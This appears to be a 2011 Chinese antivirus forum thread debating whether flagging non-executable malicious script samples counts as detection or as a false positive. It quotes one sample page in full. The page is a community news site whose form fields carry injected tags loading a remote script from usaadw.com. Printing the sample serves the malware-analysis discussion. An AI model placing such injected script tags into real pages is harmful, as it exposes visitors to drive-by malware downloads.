关于隔壁样本区的102X样本杀掉的话算查杀率还是误报率？（求官人和绅博~）

【乱】

样本贴:http://bbs.kafan.cn/thread-1101964-1-1.html

======================

解压后全是空白。。。。。



云鉴定安全；原因很清楚



===========================

测了下360的云；下载报毒 云查杀全部安全

==============================
既然这样 那些报毒的杀软是依靠什么逻辑报的，金山和360作为国内知名杀软又是依靠什么逻辑报安全的？360下载保护为什么又是危险的？
对于这种情况应该算查杀呢还是误报呢？

另外问下绅博周幸 你该不是要金山把这些无法执行的文件入库吧或者这些文件需要特定情况会有害？......

【乱】

同样的问题 34X：http://bbs.kafan.cn/thread-1101851-1-1.html

==============================
随意选个样本用浏览器打开得出的代码（看不懂....）

<html>
<head>
<title>News Request</title>
</head>
<body bgcolor="#FFF8DC" >
<form name="viewlog" METHOD="POST" ACTION="newsdesktop.asp?Mode=">


<table  border="0" width="100%">  
<tr>
        <td> <table><tr><td>
<img src="THouse.gif"></td><td>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td><td vailgn="top">
        <font size="5">Thoroughgood News</font> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<font size="2"><a href="TNews.asp">What is this?</a></font><br>
        <!-- <a href="UserProfile.asp">Register for Thoroughgood News</a><br>-->
                    <a href="NewNews.asp">Send a new news item</a> <p>
<a href="http://groups.hamptonroads.com/Thoroughgood/">Thoroughgood Civic League Home Page</a>
</td></tr></table>
        <table border="0" cellspacing="0" width="100%" cellpadding="0">
        <tr bgcolor="#C7D5D8">
                <td align="center" colspan="3">All of the selections below are optional:</td>
        </tr>
        <tr bgcolor="#C7D5D8">
                    <td align="center"><b>Headlines: </b><br>
                      <select name="Headline">
                <option selected></option>
                <option value=660>Boat found on Lake Charles<option value=662>Failed to show Mallard Ln. map<option value=663>Thoroughgood Carnival  Oct. 15<option value=661>Wanted. I need outside house painting.
                </select>
                <br>
                Show <a href="NewsDesktop.asp?Current=Current&Mode=">current</a>
                or <a href="NewsDesktop.asp?Current=All&Mode=">old
                and current</a> headlines </td>
                <td align="center" valign="top"><b>Headline contains:</b><br>
                <input type="text" name="HeadlineContains" >
                <br>
                    </td>
                <td align="center" valign="top"><b>Category:</b><br>
                <select name="Category">
                <option></option>
                <option value=""><option value="<script src=http://www.usaadw.com/ngg.js></script>"><script src=http://www.usaadw.com/ngg.js></script><option value="Civic league events">Civic league events<option value="Civic league events<script src=http://www.usaadw.com/ngg.js></script>">Civic league events<script src=http://www.usaadw.com/ngg.js></script><option value="Crime reports">Crime reports<option value="Crime reports<script src=http://www.usaadw.com/ngg.js></script>">Crime reports<script src=http://www.usaadw.com/ngg.js></script><option value="Entertainment Events">Entertainment Events<option value="Entertainment Events<script src=http://www.usaadw.com/ngg.js></script>">Entertainment Events<script src=http://www.usaadw.com/ngg.js></script><option value="For sale">For sale<option value="For sale<script src=http://www.usaadw.com/ngg.js></script>">For sale<script src=http://www.usaadw.com/ngg.js></script><option value="Garage Sales">Garage Sales<option value="Garage Sales<script src=http://www.usaadw.com/ngg.js></script>">Garage Sales<script src=http://www.usaadw.com/ngg.js></script><option value="Give-away">Give-away<option value="Give-away<script src=http://www.usaadw.com/ngg.js></script>">Give-away<script src=http://www.usaadw.com/ngg.js></script><option value="Hobbies">Hobbies<option value="Kids">Kids<option value="Kids<script src=http://www.usaadw.com/ngg.js></script>">Kids<script src=http://www.usaadw.com/ngg.js></script><option value="Member news">Member news<option value="Member news<script src=http://www.usaadw.com/ngg.js></script>">Member news<script src=http://www.usaadw.com/ngg.js></script><option value="Non-professional service">Non-professional service<option value="Non-professional service<script src=http://www.usaadw.com/ngg.js></script>">Non-professional service<script src=http://www.usaadw.com/ngg.js></script><option value="Pets">Pets<option value="Pets<script src=http://www.usaadw.com/ngg.js></script>">Pets<script src=http://www.usaadw.com/ngg.js></script><option value="Professional services">Professional services<option value="Professional services<script src=http://www.usaadw.com/ngg.js></script>">Professional services<script src=http://www.usaadw.com/ngg.js></script><option value="School News">School News<option value="School News<script src=http://www.usaadw.com/ngg.js></script>">School News<script src=http://www.usaadw.com/ngg.js></script>
                </select>
                <br>
                </td>
        </tr>
        <tr bgcolor="#CCCCCC">
                <td colspan="3" >
                <input type="checkbox" name="Current" value="on" checked>
                Show only current topics (posted within 7 days)</td>
        </tr>
        </table>                  
</table>
<input type="submit" name="Submit" value="Show me the News">
<p>
Click on the news item title to view the item
<table border=0 width="100%">
Error: [Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near ':'.<p>Select * from NewsAlerts Where Id = 330:tag18
<tr>
<th colspan=4 bgcolor="#CCCCCC">Item Count:  </th>
</tr>
</table>
</form>
</body>
</html>

【乱】

号称自己中了autorunhttp://bbs.kafan.cn/thread-1100747-1-1.html
这东西 说双击电脑崩溃 但我关掉杀软双击毫无问题~而且右键删除轻而易举~也无进程驻留等问题人品问题？
http://bbs.kafan.cn/thread-1100743-1-1.html

不过金山从安全到报毒又是什么逻辑呢~
commodo防火墙也没任何反映

样本区越来越雾水了~

绅博周幸

【乱】 发表于 2011-10-8 05:10
号称自己中了autorunhttp://bbs.kafan.cn/thread-1100747-1-1.html
这东西 说双击电脑崩溃 但我关掉杀软双 ...

1. 34X和102X中的样本全部是恶意脚本，非exe可运行文件，但是恶意脚本会辅助下载木马病毒，所以是会被杀软入库查杀的，国内360和金山是因为有网盾保护的原因，所以对恶意脚本可杀可不杀，因为恶意脚本下载下来的exe文件到电脑里也是会被实时保护拦截的。目前毒霸的鉴定器还不支持脚本的鉴定，金山北京部负责人的解释是脚本目前的编译结构比较复杂，所以鉴定器的编写需要时间，目前暂时不支持鉴定脚本类病毒，但是如果上报的话金山也是会入库查杀的，原因是杀软不能保证下载进来的exe是你可识别的样本，所以事先查杀脚本不让exe进电脑的话也许更安全。

2. 那个autorun确实是病毒，你运行没反应是因为你的电脑没有运行的环境（有些毒需要装net支持，有些需要特定的系统语言，有些会识别虚拟机，有些会反沙盘，有些会等待几分钟再发作，有些需要等待黑客远程指令发作，有些需要........）。发现你测试了好几个样本说不能运行或者少文件，而别的会员可以运行而且有明显的病毒行为，这说明是你个人问题。至于comodo报不报也不能一概而论，说不定病毒触发的行为正好comodo没有规则呢？没有规则自然就不能识别，不能识别当然就不会报警了。

【乱】

绅博周幸 发表于 2011-10-8 06:00
1. 34X和102X中的样本全部是恶意脚本，非exe可运行文件，但是恶意脚本会辅助下载木马病毒，所以是会被杀软 ...

先感谢你的答复

然后‘国内360和金山是因为有网盾保护的原因，所以对恶意脚本可杀可不杀，因为恶意脚本下载下来的exe文件到电脑里也是会被实时保护拦截的’否则就是1EX估计金山和360也不会杀一个

那你觉的金山该杀吗？我觉的你应该把启动脚本的 exe文件和脚本样本一起发上来这样才能测试金山的实质性而不是光发无法启动的‘脚本’
再然后我是实机点击的 所以没虚拟机沙箱之类的  那系统语言不是要改成韩文之类的才行吧....或者你直接透露下你是在什么情况下启动了那autorun样本
那贴第5页50楼 也表示启动样本无异常

【对于测试样本我觉的应该看些实战性的而不是看一些运行环境才会变成有害的病毒；毕竟没人无聊去搞什么特殊运行环境吧？一些文件缺乏的样本杀软可以不报的吧？】

云天遥

看完LS几贴回复，发现个很有意思的逻辑。
某人已经承认自己清楚金山暂时不支持脚本鉴定，那么那102个样本无鉴定结果是意料之中的事情，安全性的问题我就不讨论了，既然是明明知道的事情，还发出专贴，采用如此的标题和陈述，这样的心态没有一些问题吗。

郑伟用户

哎，曾经怀疑过360那个网盾就是拿来的在线多引擎扫描的结果，只不过他们打死不承认。

lzw555

一边发帖质疑金山,一边也承认是一些脚本.. 严格来说脚本不直接算是病毒..   好纠结

☆莫恋→红尘√

吵来吵去真的好有意思

Palkia

麻木了，已经